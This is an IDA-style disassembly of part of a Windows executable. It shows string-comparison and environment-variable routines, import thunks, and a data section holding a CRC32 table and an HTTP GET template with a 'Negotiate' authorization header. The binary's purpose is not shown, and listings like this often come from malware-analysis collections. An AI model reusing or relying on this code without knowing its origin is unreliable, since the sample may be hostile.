mov dword_492AD8, edi
jmp short loc_420B54
; ---------------------------------------------------------------------------
loc_420B31: ; CODE XREF: sub_420AE1+46�j
push edi
mov eax, offset dword_4370B8
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_4952EC ; CompareStringA
test eax, eax
jz loc_420D4A
mov dword_492AD8, 2
loc_420B54: ; CODE XREF: sub_420AE1+31�j
; sub_420AE1+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_420B6B
push esi
push [ebp+arg_8]
call sub_420D5E
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_420B6B: ; CODE XREF: sub_420AE1+78�j
cmp [ebp+arg_14], ebx
jle short loc_420B80
push [ebp+arg_14]
push [ebp+arg_10]
call sub_420D5E
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_420B80: ; CODE XREF: sub_420AE1+8D�j
mov eax, dword_492AD8
cmp eax, 2
jnz short loc_420BA5
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4952EC ; CompareStringA
jmp loc_420D4C
; ---------------------------------------------------------------------------
loc_420BA5: ; CODE XREF: sub_420AE1+A7�j
cmp eax, edi
jnz loc_420D4A
cmp [ebp+arg_18], ebx
jnz short loc_420BBA
mov eax, dword_49289C
mov [ebp+arg_18], eax
loc_420BBA: ; CODE XREF: sub_420AE1+CF�j
cmp esi, ebx
jz short loc_420BC7
cmp [ebp+arg_14], ebx
jnz loc_420C5F
loc_420BC7: ; CODE XREF: sub_420AE1+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_420BD4
loc_420BCC: ; CODE XREF: sub_420AE1+13C�j
; sub_420AE1+16D�j
push 2
loc_420BCE: ; CODE XREF: sub_420AE1+146�j
pop eax
jmp loc_420D4C
; ---------------------------------------------------------------------------
loc_420BD4: ; CODE XREF: sub_420AE1+E9�j
cmp [ebp+arg_14], edi
jle short loc_420BE0
loc_420BD9: ; CODE XREF: sub_420AE1+151�j
; sub_420AE1+159�j ...
mov eax, edi
jmp loc_420D4C
; ---------------------------------------------------------------------------
loc_420BE0: ; CODE XREF: sub_420AE1+F6�j
cmp esi, edi
jg short loc_420C25
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call ds:dword_495468 ; GetCPInfo
test eax, eax
jz loc_420D4A
cmp esi, ebx
jle short loc_420C29
cmp [ebp+var_3C], 2
jb short loc_420C25
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_420C25
loc_420C0B: ; CODE XREF: sub_420AE1+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_420C25
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_420C1F
cmp cl, dl
jbe short loc_420BCC
loc_420C1F: ; CODE XREF: sub_420AE1+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_420C0B
loc_420C25: ; CODE XREF: sub_420AE1+101�j
; sub_420AE1+120�j ...
push 3
jmp short loc_420BCE
; ---------------------------------------------------------------------------
loc_420C29: ; CODE XREF: sub_420AE1+11A�j
cmp [ebp+arg_14], ebx
jle short loc_420C5F
cmp [ebp+var_3C], 2
jb short loc_420BD9
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_420BD9
loc_420C3C: ; CODE XREF: sub_420AE1+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_420BD9
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_420C54
cmp cl, dl
jbe loc_420BCC
loc_420C54: ; CODE XREF: sub_420AE1+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_420C3C
jmp loc_420BD9
; ---------------------------------------------------------------------------
loc_420C5F: ; CODE XREF: sub_420AE1+E0�j
; sub_420AE1+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call ds:dword_4953EC ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_420D4A
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_416880
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_420CAE
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_420CAE: ; CODE XREF: sub_420AE1+1B5�j
cmp [ebp+var_24], ebx
jz loc_420D4A
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, ds:dword_4953EC
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_420D4A
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_420D4A
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_416880
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_420D19
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_420D19: ; CODE XREF: sub_420AE1+224�j
cmp edi, ebx
jz short loc_420D4A
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call ds:dword_4953EC ; MultiByteToWideChar
test eax, eax
jz short loc_420D4A
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4952E8 ; CompareStringW
jmp short loc_420D4C
; ---------------------------------------------------------------------------
loc_420D4A: ; CODE XREF: sub_420AE1+63�j
; sub_420AE1+C6�j ...
xor eax, eax
loc_420D4C: ; CODE XREF: sub_420AE1+BF�j
; sub_420AE1+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_420AE1 endp
; =============== S U B R O U T I N E =======================================
sub_420D5E proc near ; CODE XREF: sub_420AE1+7E�p
; sub_420AE1+95�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_420D7B
loc_420D6E: ; CODE XREF: sub_420D5E+1B�j
cmp byte ptr [eax], 0
jz short loc_420D7B
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_420D6E
loc_420D7B: ; CODE XREF: sub_420D5E+E�j
; sub_420D5E+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_420D86
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_420D86: ; CODE XREF: sub_420D5E+21�j
mov eax, edx
retn
sub_420D5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D89 proc near ; CODE XREF: sub_420A73+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_420DED
push 3Dh
push [ebp+arg_0]
call sub_420FCF
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_420DED
cmp [ebp+arg_0], esi
jz short loc_420DED
mov eax, dword_49281C
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_492820
jnz short loc_420DD3
push eax
call sub_420F68
pop ecx
mov dword_49281C, eax
loc_420DD3: ; CODE XREF: sub_420D89+3C�j
cmp eax, edi
jnz short loc_420E2B
cmp [ebp+arg_4], edi
jz short loc_420DF5
cmp dword_492824, edi
jz short loc_420DF5
call sub_420A73
test eax, eax
jz short loc_420E2B
loc_420DED: ; CODE XREF: sub_420D89+D�j
; sub_420D89+22�j ...
or eax, 0FFFFFFFFh
loc_420DF0: ; CODE XREF: sub_420D89+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_420DF5: ; CODE XREF: sub_420D89+51�j
; sub_420D89+59�j
cmp ebx, edi
jnz loc_420F09
push 4
call sub_415CF8
cmp eax, edi
pop ecx
mov dword_49281C, eax
jz short loc_420DED
mov [eax], edi
cmp dword_492824, edi
jnz short loc_420E2B
push 4
call sub_415CF8
cmp eax, edi
pop ecx
mov dword_492824, eax
jz short loc_420DED
mov [eax], edi
loc_420E2B: ; CODE XREF: sub_420D89+4C�j
; sub_420D89+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_49281C
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_420F10
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_420E8B
cmp dword ptr [edi], 0
jz short loc_420E8B
test ebx, ebx
jz short loc_420E83
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_415D6C
pop ecx
loc_420E5D: ; CODE XREF: sub_420D89+E2�j
cmp dword ptr [edi], 0
jz short loc_420E6D
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_420E5D
; ---------------------------------------------------------------------------
loc_420E6D: ; CODE XREF: sub_420D89+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_416ED2
pop ecx
test eax, eax
pop ecx
jz short loc_420EBD
jmp short loc_420EB8
; ---------------------------------------------------------------------------
loc_420E83: ; CODE XREF: sub_420D89+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_420EBD
; ---------------------------------------------------------------------------
loc_420E8B: ; CODE XREF: sub_420D89+BD�j
; sub_420D89+C2�j
test ebx, ebx
jnz short loc_420F09
test esi, esi
jge short loc_420E95
neg esi
loc_420E95: ; CODE XREF: sub_420D89+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_416ED2
pop ecx
test eax, eax
pop ecx
jz loc_420DED
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_420EB8: ; CODE XREF: sub_420D89+F8�j
mov dword_49281C, eax
loc_420EBD: ; CODE XREF: sub_420D89+F6�j
; sub_420D89+100�j
cmp [ebp+arg_4], 0
jz short loc_420F09
push [ebp+arg_0]
call sub_4158E0
inc eax
inc eax
push eax
call sub_415CF8
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_420F09
push [ebp+arg_0]
push esi
call sub_4175D0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call ds:dword_4952E4 ; SetEnvironmentVariableA
push esi
call sub_415D6C
pop ecx
loc_420F09: ; CODE XREF: sub_420D89+6E�j
; sub_420D89+104�j ...
xor eax, eax
jmp loc_420DF0
sub_420D89 endp
; =============== S U B R O U T I N E =======================================
sub_420F10 proc near ; CODE XREF: sub_420D89+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_49281C
push edi
mov eax, [esi]
test eax, eax
jz short loc_420F4B
mov edi, [esp+8+arg_4]
loc_420F22: ; CODE XREF: sub_420F10+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_420A34
add esp, 0Ch
test eax, eax
jnz short loc_420F41
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_420F5B
test al, al
jz short loc_420F5B
loc_420F41: ; CODE XREF: sub_420F10+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_420F22
loc_420F4B: ; CODE XREF: sub_420F10+C�j
mov eax, esi
sub eax, dword_49281C
sar eax, 2
neg eax
loc_420F58: ; CODE XREF: sub_420F10+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_420F5B: ; CODE XREF: sub_420F10+2B�j
; sub_420F10+2F�j
mov eax, esi
sub eax, dword_49281C
sar eax, 2
jmp short loc_420F58
sub_420F10 endp
; =============== S U B R O U T I N E =======================================
sub_420F68 proc near ; CODE XREF: sub_420D89+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_420F77
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_420F77: ; CODE XREF: sub_420F68+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_420F89
loc_420F7F: ; CODE XREF: sub_420F68+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_420F7F
loc_420F89: ; CODE XREF: sub_420F68+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_415CF8
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_420FAA
push 9
call sub_417FC6
pop ecx
loc_420FAA: ; CODE XREF: sub_420F68+38�j
mov eax, [edi]
mov ebx, edi
loc_420FAE: ; CODE XREF: sub_420F68+5B�j
test eax, eax
jz short loc_420FC5
push eax
add ebx, 4
call sub_421042
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_420FAE
; ---------------------------------------------------------------------------
loc_420FC5: ; CODE XREF: sub_420F68+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_420F68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420FCF proc near ; CODE XREF: sub_420D89+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_49402C, 0
jnz short loc_420FEA
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417B60
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420FEA: ; CODE XREF: sub_420FCF+A�j
mov ecx, [ebp+arg_0]
loc_420FED: ; CODE XREF: sub_420FCF+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_421030
movzx edx, al
test byte_494141[edx], 4
jz short loc_42101C
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_421027
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_42102B
jmp short loc_421024
; ---------------------------------------------------------------------------
loc_42101C: ; CODE XREF: sub_420FCF+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_421030
loc_421024: ; CODE XREF: sub_420FCF+4B�j
inc ecx
jmp short loc_420FED
; ---------------------------------------------------------------------------
loc_421027: ; CODE XREF: sub_420FCF+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42102B: ; CODE XREF: sub_420FCF+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421030: ; CODE XREF: sub_420FCF+25�j
; sub_420FCF+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_420FCF endp
; =============== S U B R O U T I N E =======================================
sub_421042 proc near ; CODE XREF: sub_40F942+21�p
; sub_420F68+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_421069
push esi
call sub_4158E0
inc eax
push eax
call sub_415CF8
pop ecx
test eax, eax
pop ecx
jz short loc_421069
push esi
push eax
call sub_4175D0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_421069: ; CODE XREF: sub_421042+7�j
; sub_421042+1A�j
xor eax, eax
pop esi
retn
sub_421042 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421070 proc near ; CODE XREF: sub_401E57+5E�p
; .text:00405CA9�p
jmp ds:dword_495548
sub_421070 endp
; ---------------------------------------------------------------------------
jmp ds:dword_495544
; ---------------------------------------------------------------------------
jmp ds:dword_495540
; ---------------------------------------------------------------------------
jmp ds:dword_49553C
; ---------------------------------------------------------------------------
jmp ds:dword_495538
; ---------------------------------------------------------------------------
jmp ds:dword_495534
; ---------------------------------------------------------------------------
jmp ds:dword_495530
; ---------------------------------------------------------------------------
jmp ds:dword_49552C
; ---------------------------------------------------------------------------
jmp ds:dword_495528
; ---------------------------------------------------------------------------
jmp ds:dword_495524
; ---------------------------------------------------------------------------
jmp ds:dword_495520
; ---------------------------------------------------------------------------
jmp ds:dword_49551C
; ---------------------------------------------------------------------------
jmp ds:dword_495518
; ---------------------------------------------------------------------------
jmp ds:dword_495514
; ---------------------------------------------------------------------------
jmp ds:dword_495510
; ---------------------------------------------------------------------------
jmp ds:dword_49550C
; ---------------------------------------------------------------------------
jmp ds:dword_495324
; ---------------------------------------------------------------------------
jmp ds:dword_495328
; ---------------------------------------------------------------------------
jmp ds:dword_49532C
; ---------------------------------------------------------------------------
jmp ds:dword_495330
; ---------------------------------------------------------------------------
jmp ds:dword_495334
; ---------------------------------------------------------------------------
jmp ds:dword_495338
; ---------------------------------------------------------------------------
jmp ds:dword_49533C
; ---------------------------------------------------------------------------
jmp ds:dword_495340
; ---------------------------------------------------------------------------
jmp ds:dword_495344
; ---------------------------------------------------------------------------
jmp ds:dword_495348
; ---------------------------------------------------------------------------
jmp ds:dword_49534C
; ---------------------------------------------------------------------------
jmp ds:dword_495350
; ---------------------------------------------------------------------------
jmp ds:dword_495354
; ---------------------------------------------------------------------------
jmp ds:dword_495358
; ---------------------------------------------------------------------------
jmp ds:dword_49535C
; ---------------------------------------------------------------------------
jmp ds:dword_495360
; ---------------------------------------------------------------------------
jmp ds:dword_495364
; ---------------------------------------------------------------------------
jmp ds:dword_495368
; ---------------------------------------------------------------------------
jmp ds:dword_49536C
; ---------------------------------------------------------------------------
jmp ds:dword_495370
; ---------------------------------------------------------------------------
jmp ds:dword_495374
; ---------------------------------------------------------------------------
jmp ds:dword_495378
; ---------------------------------------------------------------------------
jmp ds:dword_49537C
; ---------------------------------------------------------------------------
jmp ds:dword_495380
; ---------------------------------------------------------------------------
jmp ds:dword_495384
; ---------------------------------------------------------------------------
jmp ds:dword_495388
; ---------------------------------------------------------------------------
jmp ds:dword_49538C
; ---------------------------------------------------------------------------
jmp ds:dword_495390
; ---------------------------------------------------------------------------
jmp ds:dword_495394
; ---------------------------------------------------------------------------
jmp ds:dword_495398
; ---------------------------------------------------------------------------
jmp ds:dword_49539C
; ---------------------------------------------------------------------------
jmp ds:dword_4953A0
; ---------------------------------------------------------------------------
jmp ds:dword_4953A4
; ---------------------------------------------------------------------------
jmp ds:dword_4953A8
; ---------------------------------------------------------------------------
jmp ds:dword_4953AC
; ---------------------------------------------------------------------------
jmp ds:dword_4953B0
; ---------------------------------------------------------------------------
jmp ds:dword_4953B4
; ---------------------------------------------------------------------------
jmp ds:dword_4953B8
; ---------------------------------------------------------------------------
jmp ds:dword_4953BC
; ---------------------------------------------------------------------------
jmp ds:dword_4953C0
; ---------------------------------------------------------------------------
jmp ds:dword_4953C4
; ---------------------------------------------------------------------------
jmp ds:dword_4953C8
; ---------------------------------------------------------------------------
jmp ds:dword_4953CC
; ---------------------------------------------------------------------------
jmp ds:dword_4953D0
; ---------------------------------------------------------------------------
jmp ds:dword_4953D4
; ---------------------------------------------------------------------------
jmp ds:dword_4952E0
; ---------------------------------------------------------------------------
jmp ds:dword_4953D8
; ---------------------------------------------------------------------------
jmp ds:dword_4953DC
; ---------------------------------------------------------------------------
jmp ds:dword_4953E0
; ---------------------------------------------------------------------------
jmp ds:dword_4953E4
; ---------------------------------------------------------------------------
jmp ds:dword_4953E8
; ---------------------------------------------------------------------------
jmp ds:dword_4953EC
; ---------------------------------------------------------------------------
jmp ds:dword_4953F0
; ---------------------------------------------------------------------------
jmp ds:dword_4953F4
; ---------------------------------------------------------------------------
jmp ds:dword_4953F8
; ---------------------------------------------------------------------------
jmp ds:dword_4953FC
; ---------------------------------------------------------------------------
jmp ds:dword_495400
; ---------------------------------------------------------------------------
jmp ds:dword_495404
; ---------------------------------------------------------------------------
jmp ds:dword_495408
; ---------------------------------------------------------------------------
jmp ds:dword_49540C
; ---------------------------------------------------------------------------
jmp ds:dword_495410
; ---------------------------------------------------------------------------
jmp ds:dword_495414
; ---------------------------------------------------------------------------
jmp ds:dword_495418
; ---------------------------------------------------------------------------
jmp ds:dword_49541C
; ---------------------------------------------------------------------------
jmp ds:dword_495420
; ---------------------------------------------------------------------------
jmp ds:dword_495424
; ---------------------------------------------------------------------------
jmp ds:dword_495428
; ---------------------------------------------------------------------------
jmp ds:dword_49542C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421268 proc near ; CODE XREF: sub_41600B+23�p
; sub_4162C8+13�p
jmp ds:dword_495430
sub_421268 endp
; ---------------------------------------------------------------------------
jmp ds:dword_495434
; ---------------------------------------------------------------------------
jmp ds:dword_495438
; ---------------------------------------------------------------------------
jmp ds:dword_49543C
; ---------------------------------------------------------------------------
jmp ds:dword_495440
; ---------------------------------------------------------------------------
jmp ds:dword_495444
; ---------------------------------------------------------------------------
jmp ds:dword_495448
; ---------------------------------------------------------------------------
jmp ds:dword_49544C
; ---------------------------------------------------------------------------
jmp ds:dword_495450
; ---------------------------------------------------------------------------
jmp ds:dword_495454
; ---------------------------------------------------------------------------
jmp ds:dword_495458
; ---------------------------------------------------------------------------
jmp ds:dword_49545C
; ---------------------------------------------------------------------------
jmp ds:dword_495460
; ---------------------------------------------------------------------------
jmp ds:dword_495464
; ---------------------------------------------------------------------------
jmp ds:dword_495468
; ---------------------------------------------------------------------------
jmp ds:dword_49546C
; ---------------------------------------------------------------------------
jmp ds:dword_495470
; ---------------------------------------------------------------------------
jmp ds:dword_495474
; ---------------------------------------------------------------------------
jmp ds:dword_495478
; ---------------------------------------------------------------------------
jmp ds:dword_49547C
; ---------------------------------------------------------------------------
jmp ds:dword_495480
; ---------------------------------------------------------------------------
jmp ds:dword_495484
; ---------------------------------------------------------------------------
jmp ds:dword_495488
; ---------------------------------------------------------------------------
jmp ds:dword_495320
; ---------------------------------------------------------------------------
jmp ds:dword_49531C
; ---------------------------------------------------------------------------
jmp ds:dword_495318
; ---------------------------------------------------------------------------
jmp ds:dword_495314
; ---------------------------------------------------------------------------
jmp ds:dword_495310
; ---------------------------------------------------------------------------
jmp ds:dword_49530C
; ---------------------------------------------------------------------------
jmp ds:dword_495308
; ---------------------------------------------------------------------------
jmp ds:dword_495304
; ---------------------------------------------------------------------------
jmp ds:dword_495300
; ---------------------------------------------------------------------------
jmp ds:dword_4952FC
; ---------------------------------------------------------------------------
jmp ds:dword_4952F8
; ---------------------------------------------------------------------------
jmp ds:dword_4952F4
; ---------------------------------------------------------------------------
jmp ds:dword_4952F0
; ---------------------------------------------------------------------------
jmp ds:dword_4952EC
; ---------------------------------------------------------------------------
jmp ds:dword_4952E8
; ---------------------------------------------------------------------------
jmp ds:dword_4952E4
; ---------------------------------------------------------------------------
db 3D32h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_425084 proc near ; DATA XREF: .rdata:0042813C�o
; FUNCTION CHUNK AT 00401249 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004026A5 SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_401249
sub_425084 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_4250A2
mov ecx, [ebp+8]
jmp loc_401249
; ---------------------------------------------------------------------------
locret_4250A2: ; CODE XREF: .text:00425094�j
retn
; ---------------------------------------------------------------------------
loc_4250A3: ; DATA XREF: sub_402120�o
mov eax, offset dword_428110
jmp loc_41605A
; ---------------------------------------------------------------------------
db 0Bh dup(0CCh)
; ---------------------------------------------------------------------------
lea ecx, [ebp+14h]
jmp loc_401249
; =============== S U B R O U T I N E =======================================
sub_4250C0 proc near ; DATA XREF: .rdata:00428174�o
lea ecx, [ebp-1Ch]
jmp loc_401249
sub_4250C0 endp
; ---------------------------------------------------------------------------
loc_4250C8: ; DATA XREF: sub_40232A�o
mov eax, offset dword_428148
jmp loc_41605A
; ---------------------------------------------------------------------------
align 8
loc_4250D8: ; DATA XREF: sub_402A3E�o
mov eax, offset dword_428180
jmp loc_41605A
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_401249
; ---------------------------------------------------------------------------
loc_4250EC: ; DATA XREF: sub_415573�o
mov eax, offset dword_428260
jmp loc_41605A
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-14h]
jmp sub_4180E2
; ---------------------------------------------------------------------------
loc_425100: ; DATA XREF: sub_4155CD�o
mov eax, offset dword_428288
jmp loc_41605A
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4180E2
; ---------------------------------------------------------------------------
loc_425114: ; DATA XREF: sub_41565B�o
mov eax, offset dword_4282D0
jmp loc_41605A
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_4180E2
; ---------------------------------------------------------------------------
loc_425128: ; DATA XREF: sub_4156B4�o
mov eax, offset dword_4282F8
jmp loc_41605A
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4180E2
; ---------------------------------------------------------------------------
loc_42513C: ; DATA XREF: sub_415711�o
mov eax, offset dword_428320
jmp loc_41605A
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_401249
; ---------------------------------------------------------------------------
loc_425150: ; DATA XREF: sub_41579F�o
mov eax, offset dword_428388
jmp loc_41605A
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4180E2
; ---------------------------------------------------------------------------
loc_425164: ; DATA XREF: sub_4157F9�o
mov eax, offset dword_4283B0
jmp loc_41605A
; ---------------------------------------------------------------------------
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db ''
db '',0
align 4
dd 740000h, 39Ah dup(0)
_text ends
; Section 2. (virtual address 00027000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00027000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 427000h
dd 7 dup(0)
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40232A+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dd 4 dup(0)
dbl_427068 dq 1.388888888888889e-2 ; DATA XREF: sub_4020C1+2F�r
dd 2 dup(0)
dbl_427078 dq 1.666666666666667e-1 ; DATA XREF: sub_4020C1+15�r
dd 0
dword_427084 dd 0FFFFFFFFh ; DATA XREF: sub_402120+16F�r
; sub_4026AF�r ...
dbl_427088 dq 1.333333333333333 ; DATA XREF: sub_402120+79�r
dd 0
dword_427094 dd 0 ; DATA XREF: sub_40232A+4D�o
; sub_40278A+5B�o ...
dword_427098 dd 0 ; DATA XREF: sub_4049FE+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
